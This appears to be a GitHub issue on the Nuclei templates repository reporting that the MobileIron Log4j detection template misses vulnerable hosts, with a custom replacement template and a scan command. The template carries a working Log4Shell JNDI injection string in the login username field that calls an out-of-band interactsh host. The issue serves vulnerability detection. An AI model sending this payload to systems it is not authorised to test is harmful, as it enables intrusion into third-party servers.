### ISSUE TITLE
MobileIron Log4j Template Not Working

### ISSUE THREAD

**Issue by AdamCrosser** [projectdiscovery/nuclei-templates#4059]
### Overview

Recently I identified a MobileIron instance vulnerable to Log4j through manual testing. Upon further investigation I found that Nuclei was not properly flagging this instance as being vulnerable to Log4j. I ended up creating a custom Nuclei template to detect the issue I wanted to share.

I'm not sure why the existing template wasn't working properly. I noticed that template was using some obfuscation to get around WAFs that might have broken the template in some cases (but I have no idea). Unfortunately, I was quite busy at the time so I wasn't able to investigate further. I figured I'd open this issue since its possible others are using the upstream template to scan MobileIron instances and are missing vulnerable ones because of this.

Below is the template I leveraged to detect the MobileIron Log4j issue successfully:

```yaml
id: mobileiron-rce-custom

info:
  name: Log4j MoblieIron RCE
  author: Adam Crosser
  severity: critical
  description: MobileIron Remote Code Execution via Log4J
  reference: https://logging.apache.org/log4j/2.x/
  tags: log4j

requests:
  - raw:
      - |
        POST /mifs/j_spring_security_check  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: /mifs/user/login.jsp
        j_username=${jndi:ldap://{{interactsh-url}}/praetorian}&j_password=log4j&logincontext=employee
    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```

### Command to reproduce:

```sh
echo https://example.com/ | nuclei -t ./vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
```
